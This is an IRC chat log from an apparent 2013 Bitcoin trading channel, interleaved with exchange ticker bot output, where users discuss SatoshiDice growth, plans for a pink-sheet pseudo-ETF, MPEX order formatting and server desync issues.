coins from the big bettors appear to have been run thru a mixer Feb 01 18:12:14 but i was just curious as to are most users european or asian or american Feb 01 18:12:28 mjr_ see google trends Feb 01 18:12:36 I am guessing asian Feb 01 18:12:36 awesome Feb 01 18:12:41 i think we dont' have anything better Feb 01 18:12:41 that was my guess as well Feb 01 18:13:42 google trends shows russia on the top :D Feb 01 18:14:02 asia not so much Feb 01 18:14:36 for bitcoin Feb 01 18:14:45 yes Feb 01 18:15:19 oh if you search satoshi dice...not enough info Feb 01 18:15:22 which makes sense Feb 01 18:15:40 as most people probably don't need to google it by the time they are in the community Feb 01 18:15:47 but also...it;s a website Feb 01 18:15:55 so if you point your browser at it Feb 01 18:16:02 he'll see the requesting ip Feb 01 18:16:13 and could make some broad guesses as to demographic Feb 01 18:16:28 if it is primarily russian, and asia is not so big yet, then growth potential is huge Feb 01 18:16:57 if it is mostly asian, with some others, growth is slower, although still i expect going to be robust Feb 01 18:17:32 actually as chinese can't access google, it may be stronger there Feb 01 18:17:32 so i'm just thinking of how much of my bitcoin portfolio i would want to invest in this Feb 01 18:17:37 good point Feb 01 18:18:20 also, satoshidice isn't translated iirc. russians have less problem with english than asians Feb 01 18:18:22 it's not really super important, but emerging markets are big money, so i was curious as to expansion plans, etc, their expenses are so low Feb 01 18:18:36 localization could be a huge feature Feb 01 18:19:05 heck, even MP plans to localize mpex :P Feb 01 18:19:13 i mean, i would be bullish on it regardless...the only question is how bullish Feb 01 18:19:43 throw a dice on it Feb 01 18:19:47 hahaha Feb 01 18:19:50 but after this convo, i think that there is a ton of growth potential Feb 01 18:19:52 lol Feb 01 18:20:11 so i am thinking that the returns will be great...appreciation and dividends Feb 01 18:20:25 i think we talked about my plan last time i was on Feb 01 18:20:30 iirc Feb 01 18:20:42 [MPEX] [S.MPOE] 4321 @ 0.00066525 = 2.8745 BTC [+] Feb 01 18:20:44 [MPEX] [S.MPOE] 29279 @ 0.00066543 = 19.4831 BTC [+] Feb 01 18:20:51 30 day return from just bitcoins is around 25% Feb 01 18:21:08 but i am thinking of also using options and sdice to pad the portfolio Feb 01 18:21:32 hopefully giving investors an index of the entire bitcoin economy eventually, not just a currency index Feb 01 18:22:25 tbh...i am kinda glad that huge spike stopped, it was a bit scary Feb 01 18:22:36 what about option/futures? Feb 01 18:22:39 yes Feb 01 18:22:53 especially mpex futures need someone to marketmake them Feb 01 18:22:54 options, futures and sdice, bullish bitcoin portfolio Feb 01 18:23:21 i told you my plan is to open a publicly traded company in the real exchanges Feb 01 18:23:32 yes i saw it Feb 01 18:23:34 to hopefully act as a bridge Feb 01 18:23:45 to channel demand into the bitcoin economy Feb 01 18:24:13 bitcoin etf Feb 01 18:24:15 or etn Feb 01 18:24:18 so i am picturing it as an open fund, where as we release shares, we just increase our holdings, and long bitcoin bets Feb 01 18:24:24 exactly Feb 01 18:24:32 etf Feb 01 18:24:46 the requirements to get on pink sheets is ridiculously low Feb 01 18:24:48 so who do you know Feb 01 18:24:55 so it won't be a TRUE etf Feb 01 18:25:03 it'll be a pseudo etf Feb 01 18:25:15 I would like to open a real ETF Feb 01 18:25:25 but in the end after all, it will track the bitcoin economy Feb 01 18:25:28 who is currently working to open a real ETF? Feb 01 18:25:32 I can only imagine the regulatory shit Feb 01 18:25:33 good luck with the SEC Feb 01 18:25:42 it might be possible Feb 01 18:25:47 with the right connections and support Feb 01 18:25:51 you will need millions of dollars Feb 01 18:25:59 and that is just for lawyers and underwriters Feb 01 18:26:05 yes Feb 01 18:26:17 You would need to partner with an existing firm Feb 01 18:26:19 i think i can have mine up and running for 50k Feb 01 18:26:26 i know i can actually Feb 01 18:26:26 State street for example Feb 01 18:26:33 they won't do it Feb 01 18:26:36 i wish they would Feb 01 18:26:43 but they probably won't for quite some time Feb 01 18:26:43 how do you know Feb 01 18:26:48 i don't Feb 01 18:27:06 i am in the finance world, but i have no information about bitcoin etf's Feb 01 18:27:08 [MPEX] [S.MPOE] 524 @ 0.0006645 = 0.3482 BTC [-] Feb 01 18:27:10 [MPEX] [S.MPOE] 4321 @ 0.00066383 = 2.8684 BTC [-] Feb 01 18:27:11 [MPEX] [S.MPOE] 12386 @ 0.00066382 = 8.2221 BTC [-] Feb 01 18:27:30 i know some guys at goldman who are interested on a personal level Feb 01 18:27:37 but i don't think interest has percolated to an institutional level yet Feb 01 18:27:47 you need to know some bigger fish Feb 01 18:28:07 what i am saying is that if i knew lloyd blankfein, i couldn't get it to happne Feb 01 18:28:26 what is the main issue? Feb 01 18:28:31 regualtory complience Feb 01 18:28:32 they would politely say "that is interesting" Feb 01 18:28:36 exchanging into and out Feb 01 18:28:49 lack of market cap Feb 01 18:28:51 yes Feb 01 18:28:51 regulatory issues Feb 01 18:28:53 i don't know what the SEC would make of bitcoins Feb 01 18:28:54 [MPEX] [S.DICE] 195 @ 0.00715136 = 1.3945 BTC [-] Feb 01 18:29:04 well, if i had goldman sachs doing it, market cap wouldn't be a problem Feb 01 18:29:16 but yes, you have to capitalize it very well Feb 01 18:29:19 millions more Feb 01 18:29:34 I don't think it would be hard to raise millions Feb 01 18:29:41 i'm not saying it isn't possible, i'm hjust saying no one is willing to take the risk right now Feb 01 18:29:44 if you can create the product Feb 01 18:29:45 cuz they don't understand it Feb 01 18:29:53 once i create mine, others may follow Feb 01 18:29:58 when they see it as viable Feb 01 18:30:13 how do you solve the regulatory issue? Feb 01 18:30:22 I know a VC really interested to invest in VTC. so if you guys have a good plan, I can help you to introduce to him. Feb 01 18:30:23 [MPEX] [S.MPOE] 5110 @ 0.00066382 = 3.3921 BTC [-] Feb 01 18:30:24 [MPEX] [S.MPOE] 990 @ 0.00065988 = 0.6533 BTC [-] Feb 01 18:30:31 what is vtc? Feb 01 18:30:37 a typo Feb 01 18:30:41 lol ok Feb 01 18:30:42 awesome Feb 01 18:30:45 well this is my plan Feb 01 18:30:46 BTC Feb 01 18:30:59 you don't even have to talk to the SEC for pink sheets Feb 01 18:31:07 it is purely a listing service Feb 01 18:31:15 not like NYSE etc Feb 01 18:31:34 you could literally create a company called ScamCorp Feb 01 18:31:43 and put it up on the pink sheets Feb 01 18:31:56 and it would not cost much, there are a million ways to go public Feb 01 18:32:04 well, ok maybe not a million Feb 01 18:32:06 but it is simple Feb 01 18:32:14 the easiest way to do ti Feb 01 18:32:15 it Feb 01 18:32:17 is a reverse merger Feb 01 18:32:29 you basically buy/merge with an existing shell corporation Feb 01 18:32:40 then change your name Feb 01 18:32:45 boom, you are now a listed company Feb 01 18:32:50 you can also do a DPO Feb 01 18:32:54 direct public offering Feb 01 18:33:00 but that takes a little more regulatory work Feb 01 18:33:08 register with state Feb 01 18:33:10 stuff like that Feb 01 18:33:13 mjr_: where are you located? Feb 01 18:33:17 NYC Feb 01 18:33:18 sounds easy Feb 01 18:33:23 why are you not doing it Feb 01 18:33:27 yes, it is easy Feb 01 18:33:32 um...to buy a company takes money Feb 01 18:33:41 how much Feb 01 18:33:43 reverse merger would cost 50k maybe more Feb 01 18:33:56 and we have not even touched the issue of actually funding the fund Feb 01 18:34:02 funding is easy Feb 01 18:34:08 50k is peanuts Feb 01 18:34:18 it may well be Feb 01 18:34:21 for a startup Feb 01 18:34:23 but i don't have it at the moment Feb 01 18:34:27 or for anyone in finance. Feb 01 18:34:29 and yes its nothing for a VC Feb 01 18:34:47 i am not a CEO or something Feb 01 18:35:03 mjr_: send me a DM, we can talk privately. Maybe I can help you Feb 01 18:35:09 just an employee at a financial technology company with a couple broker dealer subsidiaries Feb 01 18:35:10 I'm on the West coast Feb 01 18:35:42 um...don't laugh, how do i send a DM Feb 01 18:36:24 i basically know how to join a group that's it Feb 01 18:36:45 mjr_: I just sent you a DM message Feb 01 18:36:46 "/msg" Feb 01 18:37:47 probably need to raise 50M to make it worth it Feb 01 18:38:00 manage that is Feb 01 18:38:59 [MPEX] [S.MPOE] 3331 @ 0.00065988 = 2.1981 BTC [-] Feb 01 18:39:01 [MPEX] [S.MPOE] 1169 @ 0.00065987 = 0.7714 BTC [-] Feb 01 18:44:01 [BTCTC] [GSDPT] 3 @ 0.0079 = 0.0237 BTC [-] Feb 01 18:45:48 [MPEX] [S.MPOE] 3628 @ 0.00065987 = 2.394 BTC [-] Feb 01 18:45:50 [MPEX] [S.MPOE] 172 @ 0.00065858 = 0.1133 BTC [-] Feb 01 18:47:22 yep Feb 01 18:47:41 a real etf will be very difficult and that is a sizable bet for something no one has heard of and dn't understand Feb 01 18:47:54 so if i start a smaller thing Feb 01 18:47:59 and then people see that it is viable Feb 01 18:48:02 hi Feb 01 18:48:09 hi Feb 01 18:52:58 [MPEX] [S.MPOE] 4321 @ 0.00066504 = 2.8736 BTC [+] Feb 01 18:53:00 [MPEX] [S.MPOE] 15050 @ 0.00066505 = 10.009 BTC [+] Feb 01 18:53:01 [MPEX] [S.MPOE] 4679 @ 0.00066543 = 3.1135 BTC [+] Feb 01 19:02:36 [MPEX] [S.MPOE] 4321 @ 0.00066538 = 2.8751 BTC [-] Feb 01 19:02:38 [MPEX] [S.MPOE] 6629 @ 0.00066543 = 4.4111 BTC [+] Feb 01 19:06:27 [MPEX] [S.DICE] 350 @ 0.00711971 = 2.4919 BTC [-] Feb 01 19:06:29 [MPEX] [S.DICE] 1250 @ 0.0071197 = 8.8996 BTC [-] Feb 01 19:09:12 [HAVELOCK] [SDICE] 2 @ 0.74000001 = 1.48 BTC [-] Feb 01 19:13:35 A properly fromatted order in mpex.py? mpex.py BUY ...? Feb 01 19:13:44 formatted Feb 01 19:16:57 'BUY|IN.ASSBOT|6|9' Feb 01 19:17:00 ;) Feb 01 19:17:19 it's the same as a regular mpex command Feb 01 19:17:58 if you give me an example of what you want to do (in english) i'll repeat it in a pympex command Feb 01 19:19:26 I just don't want to fuck up, so BUY S.DICE 50000 .0065 Feb 01 19:19:51 ;;ident Feb 01 19:19:52 You are identified as user thestringpuller, with GPG key id 0FF2943DA179E169, key fingerprint 6ACE36E786F39A4ADC4506DE0FF2943DA179E169, and bitcoin address None Feb 01 19:20:04 BUY|S.DICE|50000|00650000 Feb 01 19:20:14 Thank you smickles Feb 01 19:23:09 [MPEX] [S.MPOE] 4300 @ 0.00065891 = 2.8333 BTC [-] Feb 01 19:24:32 [MPEX] [S.DICE] 559 @ 0.00715136 = 3.9976 BTC [+] Feb 01 19:25:29 [MPEX] [S.DICE] 970 @ 0.00721182 = 6.9955 BTC [+] Feb 01 19:26:25 [MPEX] [S.DICE] 1850 @ 0.0073786 = 13.6504 BTC [+] Feb 01 19:27:46 google abitrage table updated with mouse over information giving exact price Feb 01 19:28:33 [MPEX] [S.DICE] 2633 @ 0.00738637 = 19.4483 BTC [+] Feb 01 19:31:04 [MPEX] [S.DICE] 464 @ 0.00719797 = 3.3399 BTC [-] Feb 01 19:33:03 jborkl, if you use pympex, -h shows an example Feb 01 19:33:42 oh, thanks I see that Feb 01 19:35:26 jurov: you are niko bellic Feb 01 19:35:26 the quotes are necessary, otherwise shell will do undesirable things Feb 01 19:35:37 thestringpuller wat? Feb 01 19:35:44 ;;google niko bellic Feb 01 19:35:45 Niko Bellic - Wikipedia, the free encyclopedia: ; Niko Bellic - GTA Wiki, the Grand Theft Auto Wiki - GTA IV, San ...: ; Grand Theft Auto IV: Niko Bellic Trailer - YouTube: Feb 01 19:36:28 never played GTA Feb 01 19:37:06 former soldier with violent past? muhahaahahaaa Feb 01 19:37:23 they didn't even admit me to army cause of my deafness Feb 01 19:38:40 damn, are hardcore, like they play the game of life on a higher difficulty setting than i do Feb 01 19:38:53 thestringpuller, how did you came around such association? Feb 01 19:38:57 [MPEX] [S.MPOE] 3239 @ 0.00066071 = 2.14 BTC [+] Feb 01 19:38:58 [MPEX] [S.MPOE] 14019 @ 0.00066321 = 9.2975 BTC [+] Feb 01 19:39:34 you said you were slavic Feb 01 19:39:46 lol his surname is belic Feb 01 19:39:55 would translate to 'whitey' Feb 01 19:40:16 i'm slovak. as in former czechoslovakia Feb 01 19:40:23 oh Feb 01 19:40:38 kako here is slovenian. as in yougoslavia :D Feb 01 19:40:44 *yugoslavia Feb 01 19:40:52 TITO! Feb 01 19:40:53 I feel so uncultured.. :( Feb 01 19:41:22 don't worry we have fun of it Feb 01 19:41:26 naw, you'r just 'merican Feb 01 19:42:11 it's funny how eastern europe is better at capitalism than most americans Feb 01 19:42:20 'murican's want entitlement Feb 01 19:42:30 O.o Feb 01 19:42:35 why do you think? Feb 01 19:44:25 Most American children from my generation believe they are entitled to a standard of living and do not have to work for it. Feb 01 19:44:29 http://youtu.be/ria37d9mInY?t=4s << relevant Feb 01 19:44:44 oh, wron link Feb 01 19:44:49 one sec Feb 01 19:44:52 [MPEX] [S.MPOE] 12100 @ 0.00066321 = 8.0248 BTC [+] Feb 01 19:45:00 seinfeld rules though Feb 01 19:45:27 http://youtu.be/kqhX_X7CN2s?t=4s Feb 01 19:45:39 lol thestringpuller, you weren't around here in 1989 . everyone was thinking we are entitled to live as western europe Feb 01 19:45:48 lolo Feb 01 19:45:58 but thee economic crunch came and everyome had to move their ass Feb 01 19:46:07 except east germans Feb 01 19:46:21 i guess one can thank the cold war for that? Feb 01 19:46:45 40 years in fridge? yeah, of course. Feb 01 19:47:02 http://youtu.be/kqhX_X7CN2s?t=1m39s Feb 01 19:47:08 is were it gets really good Feb 01 19:47:13 noodles kid Feb 01 19:47:53 listen to the way this kid describes working at noodles Feb 01 19:48:52 [MPEX] [S.DICE] 1000 @ 0.00739498 = 7.395 BTC [+] Feb 01 19:51:10 [MPEX] [S.DICE] 3000 @ 0.00739499 = 22.185 BTC [+] Feb 01 19:54:12 [HAVELOCK] [SDICE] 10 @ 0.79 = 7.9 BTC [+] Feb 01 19:54:25 oh, quite some mpex depositing action is ensuing today Feb 01 19:54:38 did s.dice pay divs? Feb 01 19:54:43 not yet Feb 01 19:55:05 DeaDTerra: when's the last time you talked to Erik Feb 01 19:55:18 we had a meeting scheduled yesterday but I had to cancel due to work Feb 01 19:56:02 it's that time every month: http://www.nypost.com/rw/nypost/2011/05/14/news/web_galleries/g_weekly_animals/animals_photos013--500x380.jpg Feb 01 20:02:02 added bitstamp to the google abitrage table, as well as the google libraries "bitcoin utilities" I think im done for now https://docs.google.com/spreadsheet/ccc?key=0AguYZ5-dWMgfdElhakdHQzhiQXp5emctdjZTNG9qaEE&usp=sharing Feb 01 20:02:13 updates once every minute Feb 01 20:02:25 [BTCTC] [RSM] 17 @ 0.009 = 0.153 BTC [-] Feb 01 20:02:57 [BTCTC] [RSM] 42 @ 0.0091 = 0.3822 BTC [+] Feb 01 20:03:10 seems bitcoin-central kind of sucks Feb 01 20:04:22 [BTCTC] [RSM] 50 @ 0.0092 = 0.46 BTC [+] Feb 01 20:09:55 [MPEX] [S.MPOE] 21 @ 0.00065891 = 0.0138 BTC [-] Feb 01 20:09:57 [MPEX] [S.MPOE] 4321 @ 0.00065859 = 2.8458 BTC [-] Feb 01 20:09:58 [MPEX] [S.MPOE] 3658 @ 0.00065858 = 2.4091 BTC [-] Feb 01 20:17:11 [BTCTC] [B.YABMC] 100 @ 0.0245 = 2.45 BTC [-] Feb 01 20:19:13 [HAVELOCK] [SDICE] 1 @ 0.79 BTC [+] Feb 01 20:19:14 [MPEX] [S.MPOE] 1631 @ 0.00066321 = 1.0817 BTC [+] Feb 01 20:19:16 [MPEX] [S.MPOE] 4321 @ 0.00066542 = 2.8753 BTC [+] Feb 01 20:19:17 [MPEX] [S.MPOE] 4321 @ 0.00066542 = 2.8753 BTC [+] Feb 01 20:19:17 [MPEX] [S.MPOE] 5190 @ 0.00066543 = 3.4536 BTC [+] Feb 01 20:19:19 [MPEX] [S.MPOE] 7287 @ 0.00066655 = 4.8571 BTC [+] Feb 01 20:21:50 [MPEX] [S.DICE] 400 @ 0.00739498 = 2.958 BTC [-] Feb 01 20:21:52 [MPEX] [S.DICE] 300 @ 0.00739499 = 2.2185 BTC [+] Feb 01 20:27:53 look at them sweet, sweet s.dice profits: http://blockchain.info/address/1GS6iZkXMd2sL4tBHTVG1L7Gg6FjNPWYP1 Feb 01 20:28:45 [MPEX] [S.MPOE] 4321 @ 0.00065897 = 2.8474 BTC [-] Feb 01 20:28:47 [MPEX] [S.MPOE] 1279 @ 0.00065865 = 0.8424 BTC [-] Feb 01 20:35:55 !help Feb 01 20:35:55 List of commands: Feb 01 20:35:56 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Feb 01 20:36:00 [MPEX] [S.MPOE] 4321 @ 0.00065878 = 2.8466 BTC [+] Feb 01 20:36:01 [MPEX] [S.MPOE] 4321 @ 0.00065875 = 2.8465 BTC [-] Feb 01 20:36:03 [MPEX] [S.MPOE] 15558 @ 0.00065865 = 10.2473 BTC [-] Feb 01 20:38:39 [MPEX] [S.MPOE] 3163 @ 0.00065865 = 2.0833 BTC [-] Feb 01 20:38:41 [MPEX] [S.MPOE] 2156 @ 0.00065858 = 1.4199 BTC [-] Feb 01 20:40:22 maximian Noice Feb 01 20:40:58 $21 Feb 01 20:41:20 NOICE Feb 01 20:41:46 and you can see that 2,005.05917863 of it was sent to mpex Feb 01 20:42:03 yup Feb 01 20:42:15 brace yourselves Feb 01 20:42:20 a dividend is coming Feb 01 20:42:30 [MPEX] [S.MPOE] 8724 @ 0.00065858 = 5.7455 BTC [-] Feb 01 20:42:32 [MPEX] [S.MPOE] 6735 @ 0.00065771 = 4.4297 BTC [-] Feb 01 20:42:33 [MPEX] [S.MPOE] 5880 @ 0.00065766 = 3.867 BTC [-] Feb 01 20:45:01 [MPEX] [S.DICE] 1177 @ 0.00734696 = 8.6474 BTC [-] Feb 01 20:50:12 [HAVELOCK] [SDICE] 9 @ 0.79 = 7.11 BTC [+] Feb 01 20:52:01 [MPEX] [S.MPOE] 2950 @ 0.00065766 = 1.9401 BTC [-] Feb 01 20:54:55 ;;ticker Feb 01 20:54:56 BTCUSD ticker | Best bid: 20.92002, Best ask: 21.00999, Bid-ask spread: 0.08997, Last trade: 20.92001, 24 hour volume: 51619.16184093, 24 hour low: 20.40000, 24 hour high: 21.24500, 24 hour vwap: 20.74138 Feb 01 20:55:13 rally on Feb 01 20:58:40 rally4ever Feb 01 21:01:24 [MPEX] [S.DICE] 317 @ 0.00734696 = 2.329 BTC [-] Feb 01 21:01:26 [MPEX] [S.DICE] 1229 @ 0.00723267 = 8.889 BTC [-] Feb 01 21:02:07 hey all Feb 01 21:02:31 'ello Feb 01 21:02:44 [MPEX] [S.MPOE] 4321 @ 0.00066635 = 2.8793 BTC [+] Feb 01 21:02:45 [MPEX] [S.MPOE] 9030 @ 0.00066655 = 6.0189 BTC [+] Feb 01 21:03:13 [HAVELOCK] [SDICE] 5 @ 0.785 = 3.925 BTC [-] Feb 01 21:03:15 [HAVELOCK] [SDICE] 15 @ 0.79 = 11.85 BTC [+] Feb 01 21:04:18 usually there is a date on which all owners << yeah, there's no postdate. Feb 01 21:04:39 [MPEX] [S.DICE] 2221 @ 0.00723267 = 16.0638 BTC [-] Feb 01 21:04:40 [MPEX] [S.DICE] 679 @ 0.00721781 = 4.9009 BTC [-] Feb 01 21:06:14 with the right connections and support << would be pretty grand. Feb 01 21:07:18 it's YOU Feb 01 21:08:24 BUY|S.DICE|50000|00650000 << do you find it more convenient with the lead 0s ? Feb 01 21:08:42 [MPEX] [S.MPOE] 1433 @ 0.00066655 = 0.9552 BTC [+] Feb 01 21:08:43 [MPEX] [S.MPOE] 4321 @ 0.00066819 = 2.8872 BTC [+] Feb 01 21:08:45 [MPEX] [S.MPOE] 5474 @ 0.0006682 = 3.6577 BTC [+] Feb 01 21:08:56 ;) Feb 01 21:09:28 except east germans << east german girls still had to move their ass... Feb 01 21:10:10 deadterra, i have uncredited deposits, too. stay in queue. :) Feb 01 21:10:18 lol lessee here. Feb 01 21:11:53 ok, deposits flushed. Feb 01 21:12:14 [MPEX] [S.DICE] 26666 @ 0.00739499 = 197.1948 BTC [+] Feb 01 21:14:31 [MPEX] [S.DICE] 480 @ 0.00739499 = 3.5496 BTC [+] Feb 01 21:14:46 so about webserver desync earlier : mpex uses a (trade server) - (web server) architecture. you can't talk to the trade engine directly. Feb 01 21:15:02 that link can get broken, it shouldn't happen to often but it does happen Feb 01 21:15:13 the result is new trades not being reported. they DO happen, you just don't hear about them. Feb 01 21:15:56 basically what happens is you send order X, mpex says "will be processed" and "nothing happens". Feb 01 21:16:06 something does happen, you just don't hear about it till the webserver resyncs Feb 01 21:16:37 working to make all this smoother, but traffic just keeps going up. Feb 01 21:17:20 Ah, you will need to add a server or two maybe. Feb 01 21:17:30 Looks like MPEx is growing Feb 01 21:18:27 the issue is that after desync is done, one ends up with bunch of only weakly identifiable transactions Feb 01 21:18:41 jurov the thing is tho, order of orders is preserved Feb 01 21:18:50 you should be able to recognise them by the order you put them in Feb 01 21:19:55 is that problematic ? Feb 01 21:20:00 but i mean order of trades, are they in any useful order? Feb 01 21:20:33 um. Feb 01 21:20:40 you put order A in. then B. then C. Feb 01 21:20:49 when server resyncs order execution is reported ABC Feb 01 21:20:52 not CAB or w/e Feb 01 21:21:26 suppose you do SELL|X|1000 then SELL|X|1000 Feb 01 21:21:39 you mean the "TradeHistory" part of statjson? Feb 01 21:21:47 when mpes says 500@3 200@4 300@5 750@6 Feb 01 21:22:12 this means first 1k executed 3,4,5 and 750 of the 2nd 1k executed 6 Feb 01 21:22:31 one second i'll check on trade history too so i don't say something stupid Feb 01 21:22:35 [MPEX] [S.DICE] 1350 @ 0.00739499 = 9.9832 BTC [+] Feb 01 21:23:45 i have no issue with "Book" part. once order appears ther all is willy nilly. Feb 01 21:24:14 jurov trade history is also sorted list.descending, historically. Feb 01 21:25:00 first by order, then by time? Feb 01 21:25:10 is there a ex-div date, or what the server has in it the second the div is pushed? Feb 01 21:25:56 jurov what do you mean first by order ? Feb 01 21:26:18 jborkl no exdate. whoever has shares when divs are pushed gets divs. Feb 01 21:26:45 Thanks Feb 01 21:27:53 just a small confusion, yes they are by time Feb 01 21:27:54 anyone else getting a 502 bad gateway nginx error on bitcointalk forum? Feb 01 21:28:25 jurov yeah, time only. not sorted by whether you buy or sell or anything else. Feb 01 21:28:39 DeadWeasel forum is kinda on/off. too much trolling Feb 01 21:29:16 jurov now, all that aside, webserver desyncs really should not happen. Feb 01 21:29:21 okie doke. thx. Feb 01 21:29:28 and so working on it. Feb 01 21:30:13 [HAVELOCK] [SDICE] 2 @ 0.789 = 1.578 BTC [-] Feb 01 21:30:20 !ticker m s.dice Feb 01 21:30:21 [MPEX:S.DICE] 1D: 0.00665746 / 0.00728093 / 0.00739499 (112603 shares, 819.86 BTC), 7D: 0.00534524 / 0.00723815 / 0.0075 (680391 shares, 4,924.77 BTC), 30D: 0.00085848 / 0.00481919 / 0.0075 (6561890 shares, 31,623.06 BTC) Feb 01 21:31:04 [MPEX] [S.MPOE] 4321 @ 0.00065777 = 2.8422 BTC [-] Feb 01 21:31:05 [MPEX] [S.MPOE] 4865 @ 0.00065773 = 3.1999 BTC [-] Feb 01 21:31:13 [HAVELOCK] [SDICE] 2 @ 0.79 = 1.58 BTC [+] Feb 01 21:32:20 thanks, just last question. when he trades have same timestamp, can i assume any secondary ordering? Feb 01 21:33:10 such as, trades for older orders are further to the end of the list? Feb 01 21:34:02 [MPEX] [S.MPOE] 4321 @ 0.00066001 = 2.8519 BTC [+] Feb 01 21:34:04 [MPEX] [S.MPOE] 12529 @ 0.00066006 = 8.2699 BTC [+] Feb 01 21:36:25 jurov when i say they're ordered historically i mean they're ordered in the absolute historical sense. if there's five orders on the same timestamp they're in the order they were received. Feb 01 21:36:40 if you use a single thread this would be equal to the order you sent them in Feb 01 21:36:51 but i guess if you open multiple sessions things may well get quantumified. Feb 01 21:37:10 sure i do... can't have users blocking each other :P Feb 01 21:38:59 well then we're fucked. Feb 01 21:40:03 o far i'm only fixing things manually every few days. time well paid. maybe i'll outsource it :D Feb 01 21:40:58 was also thinking to reserve right to change last satoshi for order identification purposes Feb 01 21:40:58 lol Feb 01 21:41:10 how'd that last satoshi thing work ? Feb 01 21:41:44 the problem actually arises only if there are simultaneous orders with exactly same price Feb 01 21:42:58 but as the last digit is fully relevant this isn't the way to go Feb 01 21:43:46 so this will have to wait till i buy more accounts Feb 01 21:44:06 so i can spread such orders Feb 01 21:44:22 [MPEX] [S.MPOE] 4321 @ 0.00065788 = 2.8427 BTC [-] Feb 01 21:44:24 [MPEX] [S.MPOE] 9329 @ 0.00065773 = 6.136 BTC [-] Feb 01 21:44:30 or when you provide better match info Feb 01 21:44:45 (easy decision for mpex, lol) Feb 01 21:44:51 lol. Feb 01 21:45:43 now re the other thing : i can't readily use a hash of the order itself as the only identifier cause the one time there's a collision i'm going to be so fucked there's no telling. Feb 01 21:45:58 i *could* use it as an extra field, but the db bloat may be an issue. Feb 01 21:46:13 it certainly was discussed before. Feb 01 21:46:19 there will be much sooner bit flip from cosmic rays than sha1 collision Feb 01 21:46:59 and if it's auxiliary field, something like 10chars fro the hash is sufficient Feb 01 21:47:14 collision still almost impossible Feb 01 21:47:40 well, if it's auxiliary, collision does not matter at all. Feb 01 21:48:02 even if it's 2 bytes, your odds to create a 2 byte collision... heh. Feb 01 21:49:43 [MPEX] [S.MPOE] 4321 @ 0.00065985 = 2.8512 BTC [+] Feb 01 21:49:45 [MPEX] [S.MPOE] 14321 @ 0.00066006 = 9.4527 BTC [+] Feb 01 21:55:09 lol, worrying about sha1(order+signature) collisions... it's like mpex is going to become used across whole multiverse Feb 01 21:59:17 you don't know my luck. Feb 01 22:00:03 maybe there's a bounty to make sha1 collision of meaningful strings.. so you'll get rewarded then Feb 01 22:00:42 but they're not meaningful at all. Feb 01 22:01:31 [MPEX] [S.MPOE] 4321 @ 0.00066804 = 2.8866 BTC [+] Feb 01 22:01:33 [MPEX] [S.MPOE] 13726 @ 0.0006682 = 9.1717 BTC [+] Feb 01 22:01:34 [MPEX] [S.MPOE] 1753 @ 0.00066863 = 1.1721 BTC [+] Feb 01 22:02:15 i meant, it's no on-purpose generated input on hash. they are signed mpex orders that must observe some pretty tightly defined format. Feb 01 22:03:48 mircea_popescu: yeah, the leading zeros help me conceive the number. I mentally break it into two groups of four Feb 01 22:04:10 lol i read that as deceive Feb 01 22:04:31 ;) Feb 01 22:05:16 jurov a i c what you mean Feb 01 22:05:49 smickles cool. still coming to terms wuith the ergonomics of this entire satoshi insanity. Feb 01 22:08:54 https://bitcointalk.org/index.php?topic=140541.0 Feb 01 22:09:03 apparently there's still people with balances on intersangro !? Feb 01 22:09:08 [MPEX] [S.MPOE] 4321 @ 0.0006641 = 2.8696 BTC [-] Feb 01 22:09:10 [MPEX] [S.MPOE] 1679 @ 0.00066384 = 1.1146 BTC [-] Feb 01 22:12:33 ;;ticker Feb 01 22:12:34 BTCUSD ticker | Best bid: 20.85001, Best ask: 20.99660, Bid-ask spread: 0.14659, Last trade: 20.85001, 24 hour volume: 50983.80273450, 24 hour low: 20.40000, 24 hour high: 21.24500, 24 hour vwap: 20.72846 Feb 01 22:14:00 so basically... nothinfg happened Feb 01 22:14:25 network still at ~25th Feb 01 22:16:08 [MPEX] [S.MPOE] 10550 @ 0.00066384 = 7.0035 BTC [-] Feb 01 22:24:13 [MPEX] [S.MPOE] 9529 @ 0.00066384 = 6.3257 BTC [-] Feb 01 22:24:15 [MPEX] [S.MPOE] 7397 @ 0.00066163 = 4.8941 BTC [-] Feb 01 22:30:15 [HAVELOCK] [SDICE] 6 @ 0.79 = 4.74 BTC [+] Feb 01 22:30:47 [MPEX] [S.MPOE] 3550 @ 0.00066656 = 2.3663 BTC [+] Feb 01 22:30:49 [MPEX] [S.MPOE] 4321 @ 0.00066819 = 2.8872 BTC [+] Feb 01 22:30:49 [MPEX] [S.MPOE] 8584 @ 0.0006682 = 5.7358 BTC [+] Feb 01 22:32:59 [MPEX] [S.MPOE] 4603 @ 0.00066163 = 3.0455 BTC [-] Feb 01 22:33:00 hi... anyone experienced with Irc bots? I mean to install and support a channel Feb 01 22:35:50 ask kakobrekla Feb 01 22:36:32 but it isn't rocket science Feb 01 22:37:17 [MPEX] [S.DICE] 400 @ 0.00729646 = 2.9186 BTC [-] Feb 01 22:37:18 [MPEX] [S.DICE] 800 @ 0.00728887 = 5.8311 BTC [-] Feb 01 22:39:41 try #bitcoin-bots Feb 01 22:39:59 or say #irc-bots ? Feb 01 22:41:48 [MPEX] [S.MPOE] 4321 @ 0.00065774 = 2.8421 BTC [-] Feb 01 22:41:50 [MPEX] [S.MPOE] 10956 @ 0.00065773 = 7.2061 BTC [-] Feb 01 22:41:51 [MPEX] [S.MPOE] 4323 @ 0.00065766 = 2.8431 BTC [-] Feb 01 22:45:44 [MPEX] [O.BTCUSD.C200T] 5 @ 0.22139121 = 1.107 BTC [+] Feb 01 22:46:01 [MPEX] [S.MPOE] 4321 @ 0.00065802 = 2.8433 BTC [+] Feb 01 22:46:03 [MPEX] [S.MPOE] 5994 @ 0.00065766 = 3.942 BTC [-] Feb 01 22:46:04 [MPEX] [S.MPOE] 285 @ 0.00065563 = 0.1869 BTC [-] Feb 01 22:48:11 [MPEX] [S.MPOE] 4321 @ 0.00065579 = 2.8337 BTC [+] Feb 01 22:48:13 [MPEX] [S.MPOE] 19915 @ 0.00065563 = 13.0569 BTC [-] Feb 01 22:48:14 [MPEX] [S.MPOE] 10450 @ 0.00065502 = 6.845 BTC [-] Feb 01 22:48:15 [MPEX] [S.MPOE] 8550 @ 0.00065476 = 5.5982 BTC [-] Feb 01 22:48:17 [MPEX] [S.MPOE] 14764 @ 0.00065408 = 9.6568 BTC [-] Feb 01 22:49:07 [MPEX] [S.MPOE] 3100 @ 0.00065408 = 2.0276 BTC [-] Feb 01 22:49:48 Who needs an autoupdating portfolio? Feb 01 22:49:57 